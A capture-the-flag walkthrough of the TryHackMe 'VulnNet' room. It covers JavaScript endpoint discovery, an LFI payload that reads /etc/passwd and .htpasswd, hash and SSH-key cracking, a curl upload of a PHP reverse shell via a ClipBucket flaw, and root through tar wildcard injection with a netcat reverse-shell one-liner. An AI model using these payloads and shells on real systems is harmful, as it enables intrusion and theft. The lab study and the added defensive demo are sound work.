TryHackMe - Vulnnet

TL;DR - Refer #kill-chain

Enumeration

NMAP Scan

JavaScript file analysis - GoBuster and Nikto return little of interest, so we analyze the JavaScript files served by the site instead.

Looking at http://vulnnet.thm/js/index__7ed54732.js, we find the subdomain "broadcast.vulnnet.thm", which we add to /etc/hosts on Kali pointing at the target IP.

Looking at the other JavaScript file, http://vulnnet.thm/js/index__d8338055.js, we see a link to index.php that takes a "referer" GET parameter.

Please note - extracting endpoints and parameters from JavaScript can be automated with LinkFinder - https://github.com/GerbenJavado/LinkFinder
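An added example (not part of the original writeup) of the manual JavaScript analysis above, done with grep instead of LinkFinder: it pulls hostnames under a given domain and quoted URLs carrying query parameters out of a JS file, then lists the parameter names. The embedded JS is a constructed sample, not the content of the real index__*.js files.

```shell
#!/bin/sh
# Added example, not from the original writeup: quick-and-dirty endpoint
# extraction from a JavaScript bundle. The sample JS below is constructed
# for this demo and is not the real vulnnet.thm content.

# Print every hostname under domain $2 that appears in file $1, one per line.
js_hosts() {
    grep -oE "[A-Za-z0-9.-]+\.$2" "$1" | sort -u
}

# Print every quoted path or URL in file $1 that carries a query string.
js_param_urls() {
    grep -oE "[\"'][^\"' ]*\?[A-Za-z_][A-Za-z0-9_]*=[^\"' ]*[\"']" "$1" \
        | tr -d "\"'" | sort -u
}

# Print just the parameter names seen in those URLs (the "referer" of index.php).
js_param_names() {
    js_param_urls "$1" | grep -oE '[?&][A-Za-z_][A-Za-z0-9_]*=' | tr -d '?&=' | sort -u
}

# Write the constructed sample to a temp file and run the three extractors on it.
js_recon_demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
/* constructed sample, loosely mimicking a bundled front-end script */
var api = "http://broadcast.vulnnet.thm/api/v1";
function go(u){ window.location = "index.php?referer=" + u; }
var cdn = "https://static.vulnnet.thm/assets/app.css";
var link = "/index.php?referer=https://vulnnet.thm/";
EOF
    echo "hosts:";  js_hosts "$tmp" "vulnnet.thm"
    echo "urls:";   js_param_urls "$tmp"
    echo "params:"; js_param_names "$tmp"
    rm -f "$tmp"
}

js_recon_demo
```

Run it against a downloaded bundle with js_hosts bundle.js vulnnet.thm and js_param_urls bundle.js; every host it prints is a candidate for /etc/hosts and every parameter a candidate for LFI/SQLi testing.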

broadcast.vulnnet.thm

Visiting the home page, we see that it requires HTTP Basic Authentication to proceed.

PHP Parameter analysis and gaining Foothold -

What is left is to check the PHP parameter for vulnerabilities. Parameters that take a path or URL are commonly vulnerable to Local File Inclusion (LFI), Remote File Inclusion (RFI), SQL injection etc., so we start by fuzzing "referer" for LFI.

Using the PHP filter wrapper, we confirm that index.php is vulnerable to LFI through the referer parameter:

Payload - referer=php://filter/resource=/etc/passwd

A bare php://filter with no filter chain returns the file as-is; to read PHP source (index.php itself) without the server executing it, use php://filter/convert.base64-encode/resource=index.php and base64-decode the response.

Reference - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/File%20Inclusion/README.md#lfi--rfi-using-wrappers

Since we need Basic Auth credentials for http://broadcast.vulnnet.thm, we use the LFI to read Apache's password file. A good place to look is the .htpasswd file under /etc/apache2.

Reading it, we find the credential hash -

Using JohnTheRipper, we crack the hash with the rockyou wordlist.

echo "<hash>" > hash.txt
john hash.txt --wordlist=<wordlist>

ClipBucket App - Login to broadcast.vulnnet.thm

After logging in to broadcast.vulnnet.thm with the cracked credentials, we see a ClipBucket app -

ClipBucket is version 4; searching Searchsploit shows potential exploits for gaining a foothold -

We leverage the file upload vulnerability and upload a PHP reverse shell -

Weaponized payload -

	curl -F file=@file.php -F plupload=1 -F name=shell.php \
	     -X POST http://developers:<redacted>@broadcast.vulnnet.thm/actions/beats_uploader.php

where -
file.php - https://github.com/pentestmonkey/php-reverse-shell

Reference - https://www.exploit-db.com/exploits/44250

Edit the reverse shell script first - set $ip to your VPN IP and $port to the port netcat will listen on.

Starting a listener on Kali -

rlwrap nc -nlvp 4444

Locating the uploaded shell -

http://broadcast.vulnnet.thm/actions/CB_BEATS_UPLOAD_DIR/

Browse to our uploaded script in the directory listing and the reverse shell connects back to Kali -

Privilege Escalation

We see the /var/backup/ directory contains a backup of the SSH key of the user "server-management".

Extracting key -

The key is encrypted with a passphrase, so we crack it with JohnTheRipper.

To crack it, convert the key to John's format with the ssh2john utility (shipped with john on Kali as /usr/share/john/ssh2john.py, also on GitHub) -

	python ssh2john.py private_key > private_key_john_format
	john private_key_john_format --wordlist=rockyou.txt

We get the passphrase. Next, strip the passphrase from the key with OpenSSL so ssh does not prompt for it (the key is already PEM; -out writes the decrypted copy). Alternatively, use the encrypted key directly with ssh -i and type the passphrase at the prompt.

openssl rsa -in private_key -out private_key.pem

<Enter the cracked passphrase when asked>

Then restrict the permissions on "private_key.pem", otherwise ssh refuses to use it -

chmod 0600 private_key.pem

SSH as "server-management" with the decrypted key -

ssh -i private_key.pem server-management@vulnnet.thm

We get in and find user.txt in the home folder - our first flag.

Cron Job -

We see a cron job running as root that executes the backup script.

cat /etc/cron*

Looking at the backup script, we see it archives all files in /home/server-management/Documents by passing a shell wildcard (*) to tar.

We will leverage this functionality to our advantage -

From GTFOBins we see that tar runs an arbitrary command when given --checkpoint=1 --checkpoint-action=exec=<command>. Because the wildcard is expanded by the shell before tar runs, files named like these options are passed to tar as options, which lets us run a command as root.

https://gtfobins.github.io/gtfobins/tar/#shell

Creating reverse shell script -

	cd /home/server-management/Documents
	echo "mkfifo /tmp/pe; nc <VPN IP> 5555 0</tmp/pe | /bin/sh >/tmp/pe 2>&1; rm /tmp/pe" > shell.sh

Creating dummy files whose names tar will parse as command-line options -

	echo "" > "--checkpoint-action=exec=sh shell.sh"
	echo "" > --checkpoint=1

The shell expands * into the file names in the directory, and since GNU tar accepts options anywhere on the command line, it treats the two names beginning with -- as --checkpoint options rather than as files and executes shell.sh at the first checkpoint.

The effective command will be (the quotes show that the file name with a space arrives as a single argument) -

tar czf <archive> "--checkpoint-action=exec=sh shell.sh" --checkpoint=1 shell.sh <other files>

Starting the netcat listener on Kali - rlwrap nc -nvlp 5555

Once the cron job runs, we get a root reverse shell -
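The wildcard injection above, reproduced locally as an added example (my code, not from the original writeup or the room): it builds a scratch Documents directory, plants the two option-named files and a harmless shell.sh that only writes a marker file instead of a reverse shell, runs the backup the way the cron job does (tar ... *), then runs the same backup written as tar ... ./* and reports whether shell.sh executed in each case. It assumes GNU tar (the --checkpoint options are GNU-specific); the -z flag is left out because compression does not change option parsing.

```shell
#!/bin/sh
# Added example, not part of the original writeup: reproduce the tar wildcard
# option injection in a scratch directory standing in for the root cron job,
# and contrast it with a form of the same backup that is not injectable.
# Assumes GNU tar. The "payload" only drops a marker file.

tar_wildcard_demo() {
    tar --version 2>/dev/null | grep -q 'GNU tar' || { echo skip; return 0; }

    work=$(mktemp -d)
    docs="$work/Documents"          # stands in for /home/server-management/Documents
    mkdir "$docs"
    echo "some notes" > "$docs/notes.txt"

    # What the low-privileged user plants: a script plus two files whose names
    # tar will read as options once the shell expands the wildcard.
    printf 'id -u > "%s"\n' "$work/marker" > "$docs/shell.sh"
    echo "" > "$docs/--checkpoint-action=exec=sh shell.sh"
    echo "" > "$docs/--checkpoint=1"

    # 1) The vulnerable backup: "tar cf archive *" run from inside the directory.
    #    The shell expands * into file names; GNU tar parses the two starting
    #    with -- as options and runs shell.sh before writing the first record.
    ( cd "$docs" && tar cf "$work/vuln.tar" * >/dev/null 2>&1 ) || true
    if [ -f "$work/marker" ]; then vuln=executed; else vuln=clean; fi
    rm -f "$work/marker"

    # 2) The same backup with the wildcard anchored as ./* : every expanded name
    #    now begins with ./ so none can be mistaken for an option. Writing
    #    "tar cf archive -- *" achieves the same thing.
    ( cd "$docs" && tar cf "$work/safe.tar" ./* >/dev/null 2>&1 ) || true
    if [ -f "$work/marker" ]; then safe=executed; else safe=clean; fi

    rm -rf "$work"
    echo "vulnerable=$vuln hardened=$safe"
}

tar_wildcard_demo
# expected: vulnerable=executed hardened=clean
```

In the vulnerable run the two option-named files are never archived at all, which is also how you spot this in a backup: the archive listing silently lacks entries that exist in the directory. Anchoring the glob (./*) or terminating options (--) in the cron script is the fix; quoting the wildcard does not help, since tar itself does not expand it.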

Kill Chain
